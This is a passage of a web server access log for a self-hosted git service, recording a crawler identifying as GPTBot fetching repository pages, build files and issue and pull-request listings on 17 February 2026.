+0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin/python" +[17/Feb/2026:18:05:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/python" +[17/Feb/2026:18:05:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin/python" +[17/Feb/2026:18:05:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/Makefile?display=source" [Client 74.7.227.38] [Length 17052] [Gzip 5.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:18:05:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/Makefile?display=rendered" [Client 74.7.227.38] [Length 11074] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:18:05:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/Makefile?display=rendered" [Client 74.7.227.38] [Length 11074] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:18:05:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&state=open&type=all" [Client 74.7.227.38] [Length 10139] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&state=open&type=all" +[17/Feb/2026:18:05:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&state=all&type=all" +[17/Feb/2026:18:05:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&state=all&type=all" +[17/Feb/2026:18:05:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&state=all&type=all" +[17/Feb/2026:18:05:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&state=closed&type=all" [Client 74.7.227.38] [Length 9994] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&state=open&type=all" +[17/Feb/2026:18:05:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&state=closed&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&state=open&type=all" +[17/Feb/2026:18:05:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&state=closed&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&state=open&type=all" +[17/Feb/2026:18:05:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&state=all&type=all" +[17/Feb/2026:18:05:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11016] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:18:05:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11016] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:18:05:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11017] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:18:05:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11017] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:18:05:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11016] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:18:05:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11013] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:18:05:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11017] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:18:05:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11015] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:18:05:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 32929] [Gzip 23.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:18:05:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:18:05:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:18:05:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:18:05:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:18:05:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 9978] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:18:05:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:18:05:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10132] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:18:05:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:18:05:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:18:05:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 9972] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:05:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10182] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:18:05:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:18:05:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts?display=rendered" [Client 74.7.227.38] [Length 11159] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:18:05:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake?display=rendered" [Client 74.7.227.38] [Length 11130] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:18:05:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 9989] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:18:05:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:18:05:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&state=open&type=all" [Client 74.7.227.38] [Length 9987] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls" +[17/Feb/2026:18:05:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&state=open&type=all" [Client 74.7.227.38] [Length 10161] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues" +[17/Feb/2026:18:05:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:18:05:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_KRX.py?display=rendered" [Client 74.7.227.38] [Length 11127] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_KRX.py" +[17/Feb/2026:18:05:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final.py?display=source" [Client 74.7.227.38] [Length 29512] [Gzip 8.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final.py" +[17/Feb/2026:18:05:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 44116] [Gzip 15.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" +[17/Feb/2026:18:05:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 11012] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:18:05:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 18925] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:18:05:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/build.ninja?display=rendered" [Client 74.7.227.38] [Length 11014] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/build.ninja" +[17/Feb/2026:18:05:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11635] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:18:05:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/build.ninja?display=source" [Client 74.7.227.38] [Length 16432] [Gzip 5.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/build.ninja" +[17/Feb/2026:18:05:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 70891] [Gzip 17.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/EXE-00.toc" +[17/Feb/2026:18:05:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11633] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:18:05:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 70890] [Gzip 17.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/EXE-00.toc" +[17/Feb/2026:18:05:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 69333] [Gzip 17.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PKG-00.toc" +[17/Feb/2026:18:05:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/build.ninja?display=source" [Client 74.7.227.38] [Length 16434] [Gzip 5.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 